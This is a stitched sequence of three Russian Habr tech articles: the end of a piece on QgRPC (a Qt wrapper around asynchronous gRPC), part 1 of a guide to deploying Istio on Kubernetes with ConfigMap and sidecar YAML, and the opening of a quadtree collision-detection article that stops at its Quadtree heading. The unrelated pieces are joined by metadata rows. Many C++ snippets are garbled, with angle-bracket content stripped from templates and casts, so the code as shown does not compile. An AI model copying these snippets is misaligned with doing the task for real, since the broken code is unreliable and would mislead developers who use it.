is_ok = connect(&pingservice, SIGNAL(GladToSeeYouRequest(GladToSeeYouCallData*)), this, SLOT(onGladToSeeYou(GladToSeeYouCallData*))); assert(is_ok);
is_ok = connect(&pingservice, SIGNAL(BothGladToSeeRequest(BothGladToSeeCallData*)), this, SLOT(onBothGladToSee(BothGladToSeeCallData*))); assert(is_ok);
}
public slots:
void onSayHello(SayHelloCallData* cd)
{
std::cout << "[" << cd->peer() << "][11]: request: " << cd->request.name() << std::endl;
cd->reply.set_message("hello " + cd->request.name());
cd->Finish();
}
//etc.
};
```
Когда клиент вызывает RPC, сервер gRPC уведомляет об этом клиентский код (в данном случае класс А) при помощи соответствующего сигнала.
Клиент gRPC можно использовать так:
```
class B : public QObject
{
Q_OBJECT
QpingClientService pingPongSrv;
public:
B()
{
bool c = false;
c = connect(&pingPongSrv, SIGNAL(SayHelloResponse(SayHelloCallData*)), this, SLOT(onSayHelloResponse(SayHelloCallData*))); assert(c);
c = connect(&pingPongSrv, SIGNAL(GladToSeeMeResponse(GladToSeeMeCallData*)), this, SLOT(onGladToSeeMeResponse(GladToSeeMeCallData*))); assert(c);
c = connect(&pingPongSrv, SIGNAL(GladToSeeYouResponse(GladToSeeYouCallData*)), this, SLOT(onGladToSeeYouResponse(GladToSeeYouCallData*))); assert(c);
c = connect(&pingPongSrv, SIGNAL(BothGladToSeeResponse(BothGladToSeeCallData*)), this, SLOT(onBothGladToSeeResponse(BothGladToSeeCallData*))); assert(c);
c = connect(&pingPongSrv, SIGNAL(channelStateChanged(int, int)), this, SLOT(onPingPongStateChanged(int, int))); assert(c);
}
void usage()
{
//Unary
PingRequest request;
request.set_name("user");
request.set_message("user");
pingPongSrv.SayHello(request);
//Server streaming
PingRequest request2;
request2.set_name("user");
pingPongSrv.GladToSeeMe(request2);
//etc.
}
public slots:
void SayHelloResponse(SayHelloCallData* response)
{
std::cout << "[11]: reply: " << response->reply.message() << std::endl;
if (response->CouldBeDeleted())
delete response;
}
//etc.
};
```
Клиент gRPC позволяет вызывать RPC напрямую, и подписаться на ответ сервера с помощью соответствующих сигналов.
Клиент gRPC также имеет сигнал:
```
channelStateChanged(int, int);
```
который сообщает о прошлом и текущем состояниях подключения к серверу. Весь код с примерами использования находится в [репозитории qgrpc](https://github.com/Mityuha/qgrpc).
Как это работает
----------------
Принцип включения клиента и сервера gRPC в проект изображен на рисунке.

В .pro файле проекта указываются .proto файлы, на основе которых будет работать gRPC. В файле grpc.pri прописаны команды для генерации gRPC и QgRPC файлов. Компилятор protoc генерирует gRPC файлы [protofile].grpc.pb.h и [protofile].grpc.pb.cc. [protofile] — это имя .proto файла, переданного на вход компилятора.
Генерацией QgRPC файлов [protofile].qgrpc.[config].h занимается скрипт genQGrpc.py. [config] — это либо «server», либо «client».
Генерируемые QgRPC файлы содержат обертку Qt вокруг gRPC классов и вызовов с соответствующими сигналами. В предыдущих примерах, классы QpingServerService и QpingClientService объявлены соответственно в сгенерированных файлах pingpong.qgrpc.server.h и pingpong.qgrpc.client.h. Сгенерированные QgRPC файлы добавляются в обработку к moc'у.
В сгенерированных QgRPC файлах происходит включение файлов QGrpc[config].h, в которых и происходит вся основная работа. Подробнее об этом рассказано ниже.
Чтобы подключить всю эту конструкцию в проект, в .pro файле проекта нужно подключить файл grpc.pri и указать три переменные. Переменная GRPC определяет .proto файлы, которые будут переданы на входы компилятора protoc и скрипта genQGrpc.py. Переменная QGRPC\_CONFIG определяет значение конфигурации сгенерированных QgRPC файлов и может содержать значения «server» или «client». Также можно определить опциональную переменную GRPC\_VERSION для указания версии gRPC.
Подробнее обо всем сказанном читайте файл grpc.pri и .pro файлы примеров.
Архитектура сервера
-------------------
Диаграмма классов сервера приведена на рисунке.

Толстыми стрелочками показана иерархия наследования классов, а тонкими — принадлежность членов и методов классам. В общем случае, для службы генерируется класс Q[servicename]ServerService, где servicename — имя службы, объявленное в .proto файле. RPCCallData — это управляющие структуры, сгенерированные для каждой RPC в службе. В конструкторе класса QpingServerService происходит инициализация базового класса QGrpcServerService асинхронной службой gRPC pingpong::ping::AsyncService. Для запуска службы нужно вызвать метод Start() с адресом и портом, на которых будет работать служба. В функции Start() реализована стандартная процедура запуска службы.
В конце функции Start() вызывается вызывается чисто виртуальная функция makeRequests(), которая реализована в сгенерированном классе QpingServerService:
```
void makeRequests()
{
needAnotherCallData< SayHello_RPCtypes, SayHelloCallData >();
needAnotherCallData< GladToSeeMe_RPCtypes, GladToSeeMeCallData >();
needAnotherCallData< GladToSeeYou_RPCtypes, GladToSeeYouCallData >();
needAnotherCallData< BothGladToSee_RPCtypes, BothGladToSeeCallData >();
}
```
Второй шаблонный параметр функции needAnotherCallData — это сгенерированные структуры RPCCallData. Эти же структуры являются параметрами сигналов в сгенерированном классе Qt службы.
Сгенерированные структуры RPCCallData наследуются от класса ServerCallData. В свою очередь, класс ServerCallData наследуется от респондера ServerResponder. Таким образом, создание объекта сгеренированных структур приводит к созданию объекта респондера.
Конструктор класса ServerCallData принимает два параметра: signal\_func и request\_func. signal\_func — это сгенерированный сигнал, который вызывается после получения тэга из очереди. request\_func — это функция, которая должна быть вызвана при создании нового респондера. Например, в данном случае это может быть функция RequestSayHello(). Вызов request\_func происходит именно в функции needAnotherCallData(). Это сделано для того, чтобы управление респондерами (создание и удаление) происходило в службе.
Код функции needAnotherCallData() состоит из создания объекта респондера и вызова функции, связывающей респондер с вызовом RPC:
```
template
void needAnotherCallData()
{
RPCCallData\* cd = new RPCCallData();
//...
RequestRPC
(service\_, cd->request\_func\_, cd->responder, ..., (void\*)cd);
}
```
Функции RequestRPC() — это шаблонные функции для четырех видов взаимодействия. В итоге, вызов RequestRPC() сводится к вызову:
```
service_->(cd->request_func_)(...,cd->responder, (void*)cd);
```
где service\_ — это служба gRPC. В данном случае, это pingpong::ping::AsyncService.
Для синхронной или асинхронной проверки очереди событий необходимо вызвать функции CheckCQ() или AsyncCheckCQ() соответственно. Код функции CheckCQ() сводится к вызовам функции синхронного получения тэга из очереди и обработки этого тэга:
```
virtual void CheckCQ() override
{
void* tag; bool ok;
server_cq_->Next(&tag, &ok);
//tagActions_ call
if (!tag)
return;
AbstractCallData* cd = (AbstractCallData*)tag;
if (!started_.load())
{
destroyCallData(cd);
return;
}
cd->cqReaction(this, ok);
}
```
После получения тэга из очереди идут проверки валидности тэга и старта сервера. Если сервер выключен, то тэг уже не нужен — его можно удалить. После этого вызывается функция cqReaction(), определенная в класса ServerCallData:
```
void cqReaction(const QGrpcServerService* service_, bool ok)
{
if (!first_time_reaction_)
{
first_time_reaction_ = true;
service_->needAnotherCallData();
}
auto genRpcCallData = dynamic\_cast(this);
void\* tag = static\_cast(genRpcCallData);
if (this->CouldBeDeleted())
{
service\_->destroyCallData(this);
return;
}
if (!this->processEvent(tag, ok)) return;
//call generated service signal with generated call data argument
service\_->(\*signal\_func\_)(genRpcCallData);
}
```
Флаг first\_time\_reaction\_ говорит о том, что нужно создать новый респондер для вызванной RPC. Функции CouldBeDeleted() и ProcessEvent() унаследованы от класса респондера ServerResponder соответствующего вида. Функция CouldBeDeleted() возвращает признак того, что объект респондера может быть удален. Функция processEvent() обрабатывает тэг и флаг ok. Так, например, для респондера вида Client Streaming функция выглядит следующим образом:
```
bool processEvent(void* tag, bool ok)
{
this->tag_ = tag;
read_mode_ = ok;
return true;
}
```
Функция ProcessEvent() вне зависимости от вида респондера всегда возвращает true. Возвращаемое значение этой функции оставлено для возможного расширения функциональности и, теоретически, для устранения ошибок.
После обработки события следует вызов:
```
service_->(*signal_func_)(genRpcCallData);
```
Переменная service\_ — это экземпляр сгенерированной службы, в нашем случае QpingServerService. Переменная signal\_func\_ — это сигнал службы, соответствующий конкретной RPC. Например, SayHelloRequest(). Переменная genRpcCallData — это объект респондера соответствующего вида. С точки зрения вызывающего кода, переменная genRpcCallData — это объект одной из сгенерированных структур RPCCallData.
Архитектура клиента
-------------------
По возможности, имена классов и функций клиента совпадают с именами классов и функций сервера. Диаграмма классов клиента приведена на рисунке.

Толстыми стрелочками показана иерархия наследования классов, а тонкими — принадлежность членов и методов классам. В общем случае, для службы генерируется класс Q[servicename]СlientService, где servicename — имя службы, объявленное в .proto файле. RPCCallData — это управляющие структуры, сгенерированные для каждой RPC в службе. Для вызова RPC, сгенерированный класс предоставляет функций, имена которых в точности соответствуют RPC, объявленным в .proto файле. В нашем примере, в .proto файле RPC SayHello() объявлена как:
```
rpc SayHello (PingRequest) returns (PingReply) {}
```
В сгенерированном классе QpingClientService соответствующая RPC функция выглядит так:
```
void SayHello(PingRequest request)
{
if(!connected()) return;
SayHelloCallData* call = new SayHelloCallData;
call->request = request;
call->responder = stub_->AsyncSayHello(&call->context, request, &cq_);
call->responder->Finish(&call->reply, &call->status, (void*)call);
}
```
Сгенерированные структуры RPCCallData, как и в случае сервера, наследуются в конечном счете от класса ClientResponder. Поэтому создание объекта сгенерированной структуры приводит к созданию респондера. После создания респондера происходит вызов RPC и связывание респондера с событием получения ответа от сервера. С точки зрения клиентского кода, вызов RPC выглядит следующим образом:
```
void ToSayHello()
{
PingRequest request;
request.set_name("user");
request.set_message("user");
pingPongSrv.SayHello(request);
}
```
В отличии от сгенерированного класса сервера QpingServerService, класс QpingClientService наследуется от двух шаблонных классов: ConnectivityFeatures и MonitorFeatures.
Класс ConnectivityFeatures отвечает за состояние подключения клиента с сервером и предоставляет в использование три функции: grpc\_connect(), grpc\_disconnect(), grpc\_reconnect(). Функция grpc\_disconnect() просто удаляет все структуры данных, отвечающие за взаимодействие с сервером. Вызов функции grpc\_connect сводится к вызовы функции grpc\_connect\_(), которая создает управляющие структуры данных:
```
void grpc_connect_()
{
channel_ = grpc::CreateChannel(target_, creds_);
stub_ = GRPCService::NewStub(channel_);
channelFeatures_ = std::make_unique(channel\_);
channelFeatures\_->checkChannelState();
}
```
Класс ChannelFeatures отслеживает состояние канала связи *channel\_* с сервером. Класс ConnectivityFeatures инкапсулирует объект класса ChannelFeatures и с помощью этого объекта реализует абстрактные функции channelState(), checkChannelState() и connected(). Функция channelState() выдает последнее наблюдаемое (last observed) состояние канала связи с сервером. Функция checkChannelState(), фактически, выдает текущее состояние канала. Функция connected() возвращает признак подключения клиента к серверу.
Класс MonitorFeatures отвечает за получение и обработку событий с сервера и предоставляет в использование функцию CheckCQ():
```
bool CheckCQ()
{
auto service_ = dynamic_cast< SERVICE* >(this);
//connection state
auto old_state = conn_->channelState();
auto new_state = conn_->checkChannelState();
if (old_state != new_state)
service->*channelStateChangedSignal_(old_state, new_state);
//end of connection state
void* tag;
bool ok = false;
grpc::CompletionQueue::NextStatus st;
st = cq_.AsyncNext(&tag, &ok, deadlineFromMSec(100));
if ((st == grpc::CompletionQueue::SHUTDOWN) || (st == grpc::CompletionQueue::TIMEOUT))
return false;
(AbstractCallData< SERVICE >*)(tag)->cqActions(service_, ok);
return true;
}
```
Структура кода такая же, как в случае сервера. В отличии от сервера, в клиенте добавляется блок кода, отвечающий за обработку текущего состояния. Если состояние канала связи изменилось, вызывается сигнал channelStateChangedSignal\_(). Во всех сгенерированных службах это сигнал:
```
void channelStateChanged(int, int);
```
Также, в отличии от сервера, здесь используется функция AsyncNext() вместо Next(). Это было сделано по нескольким причинам. Во-первых, при использовании AsyncNext() клиентский код имеет возможность узнать об изменении состояния канала связи. Во-вторых, при использовании AsyncNext() имеется возможность вызывать различные RPC в клиентском коде любое количество раз. Использование функции Next() в данном случае приведет к блокированию потока до получения события из очереди и, как следствие, к потере двух описанных возможностей.
После получения события из очереди, как и в случае с сервером, вызывается функция cqReaction(), определенная в классе ClientCallData:
```
void cqActions(RPC::Service* service, bool ok)
{
auto response = dynamic_cast(this);
void\* tag = static\_cast(response);
if (!this->processEvent(tag, ok)) return;
service->\*func\_( response );
}
```
Как и в случае сервера, функция processEvent() обрабатывает тэг и флаг ok и всегда возвращает true. Как и в случае сервера, после обработки события следует вызов сигнала сгенерированной службы. Однако, здесь есть два существенных отличия от одноименной серверной функции. Первое отличие состоит в том, что в этой функции не происходит создание респондеров. Cоздание респондеров, как было показано выше, происходит при вызове RPC. Второе отличие состоит в том, что в этой функции не происходит удаление респондеров. Отсутствие удаления респондеров сделано по двум причинам. Во-первых, клиентский код может использовать указатели на сгенерированные структуры RPCCallData для своих целей. Удаление содержимого по этому указателю, скрытое от клиентского кода, может привести к неприятным последствиям. Во-вторых, удаление респондера приведет к тому, что сигнал с данными сгенерирован не будет. Следовательно, клиентский код не будет получать последнее сообщение сервера. Среди нескольких альтернатив решения обозначенных проблем, было выбрано решение переложить удаление респондера (сгенерированных структур) на клиентский код. Таким образом, функции-обработчики сигналов (слоты) должны содержать следующий код:
```
void ResponseHandler(RPCCallData* response)
{
if (response->CouldBeDeleted())
delete response;
//process response
}
```
Отсутствие удаления респондера в клиентском коде приведет не только к утечке памяти, но и возможным проблемам с каналом связи. Обработчики сигналов всех видов взаимодействия RPC реализованы в коде примеров.
Заключение
----------
В заключении обратим внимание два момента. Первый момент связан с вызовом функций CheckCQ() клиента и сервера. Работают они, как было показано выше, по одному принципу: если в очереди есть событие, «эмитится» сигнал с соответствующей сгенерированной структурой RPCCallData. Можно вызывать эту функцию вручную и проверять (в случае клиента) наличие события. Но изначально была идея перенести всю сетевую часть, связанную с gRPC в другой поток. Именно для этих целей были написаны вспомогательные классы QGrpcSrvMonitor для сервера gRPC и QGrpcCliServer для клиента gRPC. Оба класса работают по одному принципу: создают отдельный поток, помещают в этот поток сгенерированную службу и периодически вызывают функцию CheckCQ() этой службы. Таким образом, при использовании обоих вспомогательных классов отпадает необходимость вызова функций CheckCQ() в клиентском коде. Cигналы сгенерированной службы, в этом случае, «приходят» из другого потока. Примеры клиента и сервера реализованы с использованием этих вспомогательных классов.
Второй момент касается той большей части разработчиков, кто в работе не использует библиотеку Qt. Классы и макросы Qt в QgRPC используются только в двух местах: в генерируемых файлах служб, и в файлах, содержащих вспомогательные классы: QGrpcServerMonitor.h и QGrpcClientMonitor.h. Остальные файлы с библиотекой Qt никак не связаны. Планировалось добавить сборку с использованием cmake, и сделать заглушки некоторым директивам Qt. В частности, классу QObject и макросу Q\_OBJECT. Но до этого просто не дошли руки. Поэтому, любые предложения приветствуются.
На этом все. Всем спасибо!
Ссылки
------
* [Репозиторий с кодом QgRPC](https://github.com/Mityuha/qgrpc)
* [Асинхронный gRPC в C++](https://habr.com/post/340758/) | https://habr.com/ru/post/420237/ | null | ru | null |
# Как запустить Istio, используя Kubernetes в production. Часть 1
Что такое [Istio](https://istio.io)? Это так называемый Service mesh, технология, которая добавляет уровень абстракции над сетью. Мы перехватываем весь или часть трафика в кластере и производим определенный набор операций с ним. Какой именно? Например, делаем умный роутинг, или реализуем подход circuit breaker, можем организовывать «canary deployment», частично переключая трафик на новую версию сервиса, а можем ограничивать внешние взаимодействия и контролировать все походы из кластера во внешнюю сеть. Есть возможность задавать policy правила для контроля походов между разными микросервисами. Наконец, мы можем получить всю карту взаимодействия по сети и сделать унифицированный сбор метрик полностью прозрачно для приложений.
Про механизм работы можно прочитать в [официальной документации](https://istio.io/docs/concepts/). Istio — это действительно мощный инструмент, который позволяет решить множество задач и проблем. В этой статье я бы хотел ответить на основные вопросы, которые обычно возникают в начале работы с Istio. Это поможет вам разобраться с ним быстрее.

### Принцип работы
Istio состоит из двух основных зон — control plane и data plane. Control plane содержит в себе основные компоненты, которые обеспечивают корректную работу остальных. В текущей версии (1.0) control plane имеет три основных компонента: Pilot, Mixer, Citadel. Citadel мы рассматривать не будем, он нужен для генерации сертификатов для обеспечения работы mutual TLS между сервисами. Давайте посмотрим подробнее на устройство и предназначение Pilot и Mixer.

Pilot — это главный управляющий компонент, который распространяет всю информацию о том, что у нас есть в кластере – сервисы, их endpoint’ы и routing правила (например, правила для Canary deployment или правила circuit breaker).
Mixer — опциональный компонент control plane, который предоставляет возможность сбора метрик, логов и любой информации о сетевом взаимодействии. Также он следит за соблюдением Policy правил и соблюдением rate limit’ов.
Data plane реализуется с помощью sidecar контейнеров-прокси. По умолчанию используется мощный [прокси-сервер envoy](https://www.envoyproxy.io/). Он может быть заменен на другую реализацию, например nginx (nginmesh).
Для того, чтобы Istio работал полностью прозрачно для приложений, есть система автоматического inject’инга. Последняя реализация подходит для версий Kubernetes 1.9+ (mutational admission webhook). Для Kubernetes версий 1.7, 1.8 есть возможность использовать Initializer.
Sidecar контейнеры соединяются с Pilot по протоколу GRPC, который позволяет оптимизировать модель пушинга изменений, происходящих в кластере. GRPC начал использоваться в Envoy начиная с версии 1.6, в Istio он используется с версии 0.8 и представляет из себя pilot-agent — обертку на golang над envoy, которая конфигурирует параметры запуска.
Pilot и Mixer являются полностью stateless компонентами, все состояние держат в памяти. Конфигурация для них задается в виде Kubernetes Custom Resources, которые сохраняются в etcd.
Istio-agent получает адрес Pilot и открывает GRPC stream к нему.
Как я уже сказал, Istio реализует всю функциональность полностью прозрачно для приложений. Давайте разберемся как. Алгоритм такой:
1. Деплоим новую версию сервиса.
2. В зависимости от подхода injecting’а sidecar контейнера добавляются istio-init контейнер и istio-agent контейнер (envoy) на этапе применения конфигурации, либо они могут быть уже вручную вставлены в описание Pod сущности Kubernetes.
3. istio-init контейнер представляет из себя скрипт, который применяет правила iptables для пода. Есть два варианта для настройки заворачивания трафика в istio-agent контейнер: использовать redirect правила iptables, либо [TPROXY](https://github.com/kristrev/tproxy-example/blob/master/tproxy_example.c). На момент написания статьи по умолчанию используется подход с redirect правилами. В istio-init есть возможность настроить какой именно трафик нужно перехватывать и направлять в istio-agent. Например, для того, чтобы перехватывать весь входящий и весь исходящий трафик, нужно установить параметры `-i` и `-b` в значение `*`. Можно указать конкретные порты, которые нужно перехватывать. Для того, чтобы не перехватывать определенную подсеть, можно указать ее с помощью флага `-x`.
4. После исполнения init контейнеров, запускаются основные, и в том числе pilot-agent (envoy). Он подключается к уже развернутому Pilot по GRPC и получает информацию о всех существующих сервисах и routing политиках в кластере. По полученным данным, он конфигурирует cluster’ы и прописывает им непосредственно endpoint’ы наших приложений в Kubernetes кластере. Также необходимо отметить важный момент: envoy динамически настраивает listeners (пары IP, port), которые начинает слушать. Поэтому, когда запросы входят в pod, перенаправляются с помощью redirect iptables правил в sidecar, envoy уже успешно может обрабатывать эти соединения и понимать, куда нужно дальше проксировать трафик. Также на этом этапе происходит отправка информации в Mixer, который мы рассмотрим позже, и отправка tracing span’ов.
В итоге мы получаем целую сеть envoy прокси-серверов, которые мы можем настраивать из одной точки (Pilot). Все inbound и outbound запросы проходят через envoy. Причем, перехватывается только TCP трафик. Это значит, что Kubernetes service IP резолвится с помощью kube-dns по UDP без изменения. Затем уже после резолва происходит перехват исходящего запроса и обработка envoy’ем, который уже решает на какой endpoint нужно отправить запрос (или не отправить, в случае политик доступа или сработки circuit breaker алгоритма).
С Pilot разобрались, теперь нужно понять как работает Mixer и зачем он нужен. Прочитать официальную документацию по нему можно [тут](https://istio.io/docs/concepts/policies-and-telemetry/overview/).
Mixer в текущем виде представляет из себя два компонента: istio-telemetry, istio-policy (до версии 0.8 это был один компонент istio-mixer). И тот, и другой представляют из себя mixer, каждый из которых отвечают за свою задачу. Istio telemetry принимает по GRPC от sidecar контейнеров Report информацию о том, кто куда идет и с какими параметрами. Istio-policy принимает Check запросы для проверки удовлетворения Policy правилам. Poilicy check проводятся, конечно, не на каждый запрос, а кэшируются на клиенте (в sidecar) на определенное время. Report check’и отправляются batch запросами. Как настраивать и какие именно параметры нужно отсылать посмотрим чуть позже.
Mixer предполагается как высокодоступный компонент, который обеспечивает бесперебойную работу по сборке и обработке telemetry данных. Система получается в итоге как многоуровневый буфер. Изначально данные буферизируются на стороне sidecar контейнеров, затем на стороне mixer и потом отправляются в так называемые mixer backend’ы. В итоге, если какой-то из компонентов системы отказывает, буфер растет и после восстановления системы флашится. Mixer backend’ы представляют из себя конечные точки отправки данных о телеметрии: statsd, newrelic и тд. Можно написать свой backend, это достаточно просто, и мы посмотрим как это сделать.

Если подытожить, схема работы с istio-telemetry такова.
1. Сервис 1 посылает запрос в сервис 2.
2. При выходе из сервиса 1, запрос заворачивается в его же sidecar.
3. Sidecar envoy следит за тем, как проходит запрос в сервис 2 и подготавливает необходимую информацию.
4. Затем отправляет её в istio-telemetry с помощью Report запроса.
5. Istio-telemetry определяет, нужно ли отправлять этот Report в backend’ы, в какие именно и какие данные нужно отправлять.
6. Istio-telemetry отправляет Report данные в backend если это необходимо.
Теперь посмотрим, как развернуть в системе Istio, состоящий только из основных компонентов (Pilot и sidecar envoy).
Для начала посмотрим на основную конфигурацию (mesh), которую читает Pilot:
```
apiVersion: v1
kind: ConfigMap
metadata:
name: istio
namespace: istio-system
labels:
app: istio
service: istio
data:
mesh: |-
# пока что не включаем отправку tracing информации (pilot настроит envoy’и таким образом, что отправка не будет происходить)
enableTracing: false
# пока что не указываем mixer endpoint’ы, чтобы sidecar контейнеры не отправляли информацию туда
#mixerCheckServer: istio-policy.istio-system:15004
#mixerReportServer: istio-telemetry.istio-system:15004
# ставим временной промежуток, с которым будет envoy переспрашивать Pilot (это для старой версии envoy proxy)
rdsRefreshDelay: 5s
# default конфигурация для envoy sidecar
defaultConfig:
# аналогично как rdsRefreshDelay
discoveryRefreshDelay: 5s
# оставляем по умолчанию (путь к конфигурации и бинарю envoy)
configPath: "/etc/istio/proxy"
binaryPath: "/usr/local/bin/envoy"
# дефолтное имя запущенного sidecar контейнера (используется, например, в именах сервиса при отправке tracing span’ов)
serviceCluster: istio-proxy
# время, которое будет ждать envoy до того, как он принудительно завершит все установленные соединения
drainDuration: 45s
parentShutdownDuration: 1m0s
# по умолчанию используются REDIRECT правила iptables. Можно изменить на TPROXY.
#interceptionMode: REDIRECT
# Порт, на котором будет запущена admin панель каждого sidecar контейнера (envoy)
proxyAdminPort: 15000
# адрес, по которому будут отправляться trace’ы по zipkin протоколу (в начале мы отключили саму отправку, поэтому это поле сейчас не будет использоваться)
zipkinAddress: tracing-collector.tracing:9411
# statsd адрес для отправки метрик envoy контейнеров (отключаем)
# statsdUdpAddress: aggregator:8126
# выключаем поддержку опции Mutual TLS
controlPlaneAuthPolicy: NONE
# адрес, на котором будет слушать istio-pilot для того, чтобы сообщать информацию о service discovery всем sidecar контейнерам
discoveryAddress: istio-pilot.istio-system:15007
```
Все основные компоненты управления (control plane) расположим в namespace istio-system в Kubernetes.
Минимально нам нужно развернуть только Pilot. Для этого воспользуемся [такой конфигурацией.](https://github.com/istio/istio/blob/release-1.0/install/kubernetes/helm/istio/charts/pilot/templates/deployment.yaml)
И настроим вручную injecting sidecar контейнера.
Init container:
```
initContainers:
- name: istio-init
args:
- -p
- "15001"
- -u
- "1337"
- -m
- REDIRECT
- -i
- '*'
- -b
- '*'
- -d
- ""
image: istio/proxy_init:1.0.0
imagePullPolicy: IfNotPresent
resources:
limits:
memory: 128Mi
securityContext:
capabilities:
add:
- NET_ADMIN
```
И sidecar:
```
name: istio-proxy
args:
- "bash"
- "-c"
- |
exec /usr/local/bin/pilot-agent proxy sidecar \
--configPath \
/etc/istio/proxy \
--binaryPath \
/usr/local/bin/envoy \
--serviceCluster \
service-name \
--drainDuration \
45s \
--parentShutdownDuration \
1m0s \
--discoveryAddress \
istio-pilot.istio-system:15007 \
--discoveryRefreshDelay \
1s \
--connectTimeout \
10s \
--proxyAdminPort \
"15000" \
--controlPlaneAuthPolicy \
NONE
env:
- name: POD_NAME
valueFrom:
fieldRef:
fieldPath: metadata.name
- name: POD_NAMESPACE
valueFrom:
fieldRef:
fieldPath: metadata.namespace
- name: INSTANCE_IP
valueFrom:
fieldRef:
fieldPath: status.podIP
- name: ISTIO_META_POD_NAME
valueFrom:
fieldRef:
fieldPath: metadata.name
- name: ISTIO_META_INTERCEPTION_MODE
value: REDIRECT
image: istio/proxyv2:1.0.0
imagePullPolicy: IfNotPresent
resources:
requests:
cpu: 100m
memory: 128Mi
limits:
memory: 2048Mi
securityContext:
privileged: false
readOnlyRootFilesystem: true
runAsUser: 1337
volumeMounts:
- mountPath: /etc/istio/proxy
name: istio-envoy
```
Для того, чтобы все успешно запустилось, нужно завести ServiceAccount, ClusterRole, ClusterRoleBinding, CRD для Pilot, описания которых можно найти [тут](https://github.com/istio/istio/tree/release-1.0/install/kubernetes/helm/istio/charts/pilot/templates).
В итоге сервис, в который мы inject’им sidecar с envoy, должен успешно запуститься, получить весь discovery из пилота и обрабатывать запросы.
Важно понимать, что все компоненты control plane являются stateless приложениями и могут быть без проблем горизонтально масштабированы. Все данные лежат в etcd в виде кастомных описаний ресурсов Kubernetes.
Также у Istio (пока что экспериментально) есть возможность запуска вне кластера и возможность смотреть и шарить service discovery между несколькими Kubernetes кластерами. Подробнее об этом можно почитать [тут](https://istio.io/docs/setup/kubernetes/multicluster-install/).
При мультикластерной установке следует учитывать следующие ограничения:
1. Pod CIDR и Service CIDR должны быть уникальны по всем кластерам и не должны пересекаться.
2. Все Pod CIDR должны быть доступны от любых Pod CIDR между кластерами.
3. Все Kubernetes API серверы должны быть доступны друг для друга.
Это начальные сведения, которые помогут вам приступить к работе с Istio. Однако есть еще множество подводных камней. Например, особенности роутинга внешнего трафика (наружу кластера), подходы к отладке sidecar’ов, профилирование, настройка mixer и написание кастомного mixer backend, настройка tracing механизма и его работа с помощью envoy.
Всё это мы рассмотрим в следующих публикациях. Задавайте ваши вопросы, постараюсь их осветить. | https://habr.com/ru/post/419319/ | null | ru | null |
# Деревья квадрантов и распознавание коллизий

Эта неделя была короткой, в понедельник и вторник я продолжал работать над [системой 2D-освещения](https://pvigier.github.io/2019/07/28/vagabond-2d-light-system.html). Остальное время я потратил на реализацию деревьев квадрантов ([quadtree](https://en.wikipedia.org/wiki/Quadtree)).
В этой статье я поделюсь своей реализацией и мыслями, возникшими в процессе её проектирования.
Во-первых, мне нужно сказать, почему я решил реализовать дерево квадрантов.
Quadtree — это [структура данных разбиения пространства](https://en.wikipedia.org/wiki/Space_partitioning). Её основное преимущество по сравнению с другими структурами данных заключается в адаптивности. Оно обеспечивает хорошую производительность при вставке, удалении и поиске. То есть мы можем использовать это дерево в динамическом контексте, где данные часто меняются. Более того, эту структуру довольно легко понять и реализовать.
Если разбиение пространства для вас новая тема, то рекомендую прочитать эту [статью](http://gameprogrammingpatterns.com/spatial-partition.html) Роберта Нистрома. Если вы хотите более подробно узнать о деревьях квадрантов, то прочитайте [эту](https://gamedevelopment.tutsplus.com/tutorials/quick-tip-use-quadtrees-to-detect-likely-collisions-in-2d-space--gamedev-374) или [эту](https://jimkang.com/quadtreevis/) статьи.
В моей игре есть области, в которых использование quadtree мгновенно оправдывает себя:
* При распознавании коллизий дерево квадрантов намного эффективнее, чем способ грубого перебора (brute-force) (тестирование всех пар). Но это не самый эффективный подход, обзор различных методик и бенчмарки можно изучить в [этой статье](https://0fps.net/2015/01/23/collision-detection-part-3-benchmarks/). Тем не менее, для первой версии своего физического движка я использую его. Возможно, позже при необходимости я выберу более специализированный алгоритм.
* В [графе сцены](https://pvigier.github.io/2019/07/14/vagabond-game-engine-foundations.html) при выполнении отсечения я могу использовать quadtree для поиска всех видимых узлов.
* В [системе освещения](https://pvigier.github.io/2019/07/28/vagabond-2d-light-system.html) можно использовать quadtree для нахождения стен, пересекающих полигон видимости источника света.
* В системе ИИ можно использовать quadtree для поиска всех объектов или врагов, находящихся близко к сущности.
* И так далее...
Как вы можете понять, деревья квадрантов довольно универсальны. Они будут хорошим пополнением в вашем инструментарии.
Весь показанный в статье код можно найти на [GitHub](https://github.com/pvigier/Quadtree).
Предварительная подготовка
==========================
Прежде чем детализировать код quadtree, нам потребуются небольшие классы для геометрических примитивов: класс `Vector2` для задания точек и класс `Box` для задания прямоугольников. Оба будут шаблонными.
Vector2
-------
Класс [`Vector2`](https://github.com/pvigier/Quadtree/blob/master/include/Vector2.h) минималистичен. Он содержит только конструкторы, а также операторы `+` и `/`. Это всё, что нам потребуется:
```
template
class Vector2
{
public:
T x;
T y;
constexpr Vector2(T X = 0, T Y = 0) noexcept : x(X), y(Y)
{
}
constexpr Vector2& operator+=(const Vector2& other) noexcept
{
x += other.x;
y += other.y;
return \*this;
}
constexpr Vector2& operator/=(T t) noexcept
{
x /= t;
y /= t;
return \*this;
}
};
template
constexpr Vector2 operator+(Vector2 lhs, const Vector2& rhs) noexcept
{
lhs += rhs;
return lhs;
}
template
constexpr Vector2 operator/(Vector2 vec, T t) noexcept
{
vec /= t;
return vec;
}
```
Box
---
Класс [`Box`](https://github.com/pvigier/Quadtree/blob/master/include/Box.h) ненамного сложнее:
```
template
class Box
{
public:
T left;
T top;
T width; // Must be positive
T height; // Must be positive
constexpr Box(T Left = 0, T Top = 0, T Width = 0, T Height = 0) noexcept :
left(Left), top(Top), width(Width), height(Height)
{
}
constexpr Box(const Vector2& position, const Vector2& size) noexcept :
left(position.x), top(position.y), width(size.x), height(size.y)
{
}
constexpr T getRight() const noexcept
{
return left + width;
}
constexpr T getBottom() const noexcept
{
return top + height;
}
constexpr Vector2 getTopLeft() const noexcept
{
return Vector2(left, top);
}
constexpr Vector2 getCenter() const noexcept
{
return Vector2(left + width / 2, top + height / 2);
}
constexpr Vector2 getSize() const noexcept
{
return Vector2(width, height);
}
constexpr bool contains(const Box& box) const noexcept
{
return left <= box.left && box.getRight() <= getRight() &&
top <= box.top && box.getBottom() <= getBottom();
}
constexpr bool intersects(const Box& box) const noexcept
{
return !(left >= box.getRight() || getRight() <= box.left ||
top >= box.getBottom() || getBottom() <= box.top);
}
};
```
Он содержит несколько полезных геттеров.
Интереснее то, что он содержит метод `contains`, проверяющий, находится ли прямоугольник внутри другого, и метод `intersects`, проверяющий, пересекается ли прямоугольник с другим.
Мы будем использовать `contains` при вставке и удалении, а `intersects` — при распознавании пересечений.
Quadtree
========
